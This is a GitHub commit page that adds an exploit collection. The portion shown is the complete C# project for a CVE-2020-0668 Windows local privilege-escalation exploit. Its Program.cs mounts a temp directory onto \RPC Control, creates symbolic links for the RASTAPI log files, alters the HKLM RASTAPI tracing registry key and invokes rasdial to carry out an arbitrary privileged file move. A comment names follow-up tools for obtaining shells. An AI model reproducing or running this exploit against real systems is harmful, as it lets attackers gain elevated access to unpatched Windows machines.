add several 2020 cve

killvxk · Mar 1, 2022 · e91fbcd · e91fbcd
1 parent 5940ce2
commit e91fbcd
Show file tree

Hide file tree

Showing 245 changed files with 34,005 additions and 0 deletions.
diff --git a/00-CVE_EXP/CVE-2020-0668/CVE-2020-0668.exe b/00-CVE_EXP/CVE-2020-0668/CVE-2020-0668.exe
diff --git a/00-CVE_EXP/CVE-2020-0668/CVE-2020-0668/App.config b/00-CVE_EXP/CVE-2020-0668/CVE-2020-0668/App.config
@@ -0,0 +1,6 @@
+<?xml version="1.0" encoding="utf-8" ?>
+<configuration>
+    <startup> 
+        <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.7.2" />
+    </startup>
+</configuration>
diff --git a/00-CVE_EXP/CVE-2020-0668/CVE-2020-0668/CVE-2020-0668.csproj b/00-CVE_EXP/CVE-2020-0668/CVE-2020-0668/CVE-2020-0668.csproj
@@ -0,0 +1,71 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
+  <PropertyGroup>
+    <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
+    <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
+    <ProjectGuid>{1B4C5EC1-2845-40FD-A173-62C450F12EA5}</ProjectGuid>
+    <OutputType>Exe</OutputType>
+    <RootNamespace>CVE_2020_0668</RootNamespace>
+    <AssemblyName>CVE-2020-0668</AssemblyName>
+    <TargetFrameworkVersion>v4.7.2</TargetFrameworkVersion>
+    <FileAlignment>512</FileAlignment>
+    <AutoGenerateBindingRedirects>true</AutoGenerateBindingRedirects>
+    <Deterministic>true</Deterministic>
+  </PropertyGroup>
+  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
+    <PlatformTarget>AnyCPU</PlatformTarget>
+    <DebugSymbols>true</DebugSymbols>
+    <DebugType>full</DebugType>
+    <Optimize>false</Optimize>
+    <OutputPath>bin\Debug\</OutputPath>
+    <DefineConstants>DEBUG;TRACE</DefineConstants>
+    <ErrorReport>prompt</ErrorReport>
+    <WarningLevel>4</WarningLevel>
+  </PropertyGroup>
+  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
+    <PlatformTarget>AnyCPU</PlatformTarget>
+    <DebugType>pdbonly</DebugType>
+    <Optimize>true</Optimize>
+    <OutputPath>bin\Release\</OutputPath>
+    <DefineConstants>TRACE</DefineConstants>
+    <ErrorReport>prompt</ErrorReport>
+    <WarningLevel>4</WarningLevel>
+  </PropertyGroup>
+  <ItemGroup>
+    <Reference Include="NtApiDotNet, Version=1.0.0.0, Culture=neutral, processorArchitecture=MSIL">
+      <HintPath>packages\NtApiDotNet.1.1.27\lib\net45\NtApiDotNet.dll</HintPath>
+    </Reference>
+    <Reference Include="System" />
+    <Reference Include="System.Core" />
+    <Reference Include="System.Xml.Linq" />
+    <Reference Include="System.Data.DataSetExtensions" />
+    <Reference Include="Microsoft.CSharp" />
+    <Reference Include="System.Data" />
+    <Reference Include="System.Net.Http" />
+    <Reference Include="System.Xml" />
+  </ItemGroup>
+  <ItemGroup>
+    <Compile Include="Program.cs" />
+    <Compile Include="Properties\AssemblyInfo.cs" />
+    <Compile Include="Properties\Resources.Designer.cs">
+      <AutoGen>True</AutoGen>
+      <DesignTime>True</DesignTime>
+      <DependentUpon>Resources.resx</DependentUpon>
+    </Compile>
+  </ItemGroup>
+  <ItemGroup>
+    <None Include="App.config" />
+    <None Include="packages.config" />
+  </ItemGroup>
+  <ItemGroup>
+    <EmbeddedResource Include="Properties\Resources.resx">
+      <Generator>ResXFileCodeGenerator</Generator>
+      <LastGenOutput>Resources.Designer.cs</LastGenOutput>
+    </EmbeddedResource>
+  </ItemGroup>
+  <ItemGroup>
+    <None Include="Resources\phonebook.txt" />
+  </ItemGroup>
+  <Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
+</Project>
diff --git a/00-CVE_EXP/CVE-2020-0668/CVE-2020-0668/CVE-2020-0668.sln b/00-CVE_EXP/CVE-2020-0668/CVE-2020-0668/CVE-2020-0668.sln
@@ -0,0 +1,25 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio Version 16
+VisualStudioVersion = 16.0.29806.167
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "CVE-2020-0668", "CVE-2020-0668.csproj", "{1B4C5EC1-2845-40FD-A173-62C450F12EA5}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|Any CPU = Debug|Any CPU
+		Release|Any CPU = Release|Any CPU
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{1B4C5EC1-2845-40FD-A173-62C450F12EA5}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
+		{1B4C5EC1-2845-40FD-A173-62C450F12EA5}.Debug|Any CPU.Build.0 = Debug|Any CPU
+		{1B4C5EC1-2845-40FD-A173-62C450F12EA5}.Release|Any CPU.ActiveCfg = Release|Any CPU
+		{1B4C5EC1-2845-40FD-A173-62C450F12EA5}.Release|Any CPU.Build.0 = Release|Any CPU
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+	GlobalSection(ExtensibilityGlobals) = postSolution
+		SolutionGuid = {D31765F2-0CE6-4B07-9D34-58301467BB88}
+	EndGlobalSection
+EndGlobal
diff --git a/00-CVE_EXP/CVE-2020-0668/CVE-2020-0668/Program.cs b/00-CVE_EXP/CVE-2020-0668/CVE-2020-0668/Program.cs
@@ -0,0 +1,104 @@
+using NtApiDotNet;
+using System;
+using System.Threading;
+using System.IO;
+using Microsoft.Win32;
+using System.Diagnostics;
+
+//TODO actually get shells using https://github.com/itm4n/UsoDllLoader OR https://github.com/xct/diaghub
+
+namespace CVE_2020_0668
+{
+    class Program
+    {
+        static void Main(string[] args)
+        {
+            if (args.Length != 2)
+            {
+                Console.WriteLine("Use CVE-2020-0668 to perform an arbitrary privileged file move operation.");
+                Console.WriteLine($"Usage: inFilePath outFilePath");
+                return;
+            }
+            String inDLLPath = args[0];
+            String outDllPath = args[1];
+
+            if (!File.Exists(inDLLPath))
+            {
+                Console.WriteLine($@"[!] Cannot find {inDLLPath}!");
+                return;
+            }
+            Console.WriteLine(String.Format("[+] Moving {0} to {1}", inDLLPath, outDllPath));
+
+            String tempDirectory = GetTemporaryDirectory();
+            const string ObjectDirectory = @"\RPC Control";
+
+            Console.WriteLine($@"[+] Mounting {ObjectDirectory} onto {tempDirectory}");
+            string tempDirectoryNt = NtFileUtils.DosFileNameToNt(tempDirectory);
+            NtFile.CreateMountPoint(tempDirectoryNt, ObjectDirectory, "");
+
+            Console.WriteLine("[+] Creating symbol links");
+
+
+            var logFileSymlnk = NtSymbolicLink.Create($@"{ObjectDirectory}\RASTAPI.LOG", $@"\??\{inDLLPath}");
+            var oldFileSymlnk = NtSymbolicLink.Create($@"{ObjectDirectory}\RASTAPI.OLD", $@"\??\{outDllPath}");
+
+            Console.WriteLine(@"[+] Updating the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RASPLAP configuration.");
+            Console.WriteLine(@"[+] Sleeping for 5 seconds so the changes take effect");
+            UpdateRASTAPITracingConfig(tempDirectory, true, 0x1000);
+            Thread.Sleep(5000); // might have to sleep for the update to take effect 
+
+
+            string phonebookPath = Path.Combine(Path.GetTempPath(), Guid.NewGuid().ToString() + ".pbk");
+            Console.WriteLine($"[+] Writing phonebook file to {phonebookPath}");
+            File.WriteAllText(phonebookPath, CVE_2020_0668.Properties.Resources.Phonebook);
+
+            using (Process p = new Process())
+            {
+                p.StartInfo.FileName = "rasdial";
+                p.StartInfo.Arguments = $@"VPNTEST test test /PHONEBOOK:{phonebookPath}";
+                p.StartInfo.CreateNoWindow = true;
+                p.StartInfo.UseShellExecute = false;
+                p.Start();
+                p.WaitForExit();
+            }
+
+            Console.WriteLine("[+] Cleaning up");
+            File.Delete(phonebookPath);
+            Directory.Delete(tempDirectory, true);
+            logFileSymlnk.Close();
+            oldFileSymlnk.Close();
+            UpdateRASTAPITracingConfig(@"%windir%\tracing", false, 0x100000); //those are the default values
+
+
+            Console.WriteLine("[+] Done!");
+        }
+
+        static public void UpdateRASTAPITracingConfig(string logDirectory, bool enabled, int logSize)
+        {
+            using (RegistryKey HKLocalMachine = RegistryKey.OpenBaseKey(RegistryHive.LocalMachine, RegistryView.Registry64))
+            {
+                using (RegistryKey key = HKLocalMachine.OpenSubKey(@"SOFTWARE\Microsoft\Tracing\RASTAPI", true))
+                {
+                    if (key != null)
+                    {
+                        key.SetValue(@"FileDirectory", logDirectory);
+                        key.SetValue(@"MaxFileSize", logSize);
+                        key.SetValue(@"EnableFileTracing", enabled ? 1 : 0);
+                    }
+                    else
+                    {
+                        Console.WriteLine(@"[!] Failed to open HKLM\SOFTWARE\Microsoft\Tracing\RASTAPI with write access!");
+                        System.Environment.Exit(1);
+                    }
+                }
+            }
+        }
+        static public string GetTemporaryDirectory()
+        {
+            string tempDirectory = Path.Combine(Path.GetTempPath(), Path.GetRandomFileName());
+            Directory.CreateDirectory(tempDirectory);
+            return tempDirectory;
+        }
+
+    }
+}
diff --git a/00-CVE_EXP/CVE-2020-0668/CVE-2020-0668/Properties/AssemblyInfo.cs b/00-CVE_EXP/CVE-2020-0668/CVE-2020-0668/Properties/AssemblyInfo.cs
@@ -0,0 +1,36 @@
+using System.Reflection;
+using System.Runtime.CompilerServices;
+using System.Runtime.InteropServices;
+
+// General Information about an assembly is controlled through the following
+// set of attributes. Change these attribute values to modify the information
+// associated with an assembly.
+[assembly: AssemblyTitle("CVE-2020-0668")]
+[assembly: AssemblyDescription("")]
+[assembly: AssemblyConfiguration("")]
+[assembly: AssemblyCompany("")]
+[assembly: AssemblyProduct("CVE-2020-0668")]
+[assembly: AssemblyCopyright("Copyright ©  2020")]
+[assembly: AssemblyTrademark("")]
+[assembly: AssemblyCulture("")]
+
+// Setting ComVisible to false makes the types in this assembly not visible
+// to COM components.  If you need to access a type in this assembly from
+// COM, set the ComVisible attribute to true on that type.
+[assembly: ComVisible(false)]
+
+// The following GUID is for the ID of the typelib if this project is exposed to COM
+[assembly: Guid("1b4c5ec1-2845-40fd-a173-62c450f12ea5")]
+
+// Version information for an assembly consists of the following four values:
+//
+//      Major Version
+//      Minor Version
+//      Build Number
+//      Revision
+//
+// You can specify all the values or you can default the Build and Revision Numbers
+// by using the '*' as shown below:
+// [assembly: AssemblyVersion("1.0.*")]
+[assembly: AssemblyVersion("1.0.0.0")]
+[assembly: AssemblyFileVersion("1.0.0.0")]
diff --git a/00-CVE_EXP/CVE-2020-0668/CVE-2020-0668/Properties/Resources.Designer.cs b/00-CVE_EXP/CVE-2020-0668/CVE-2020-0668/Properties/Resources.Designer.cs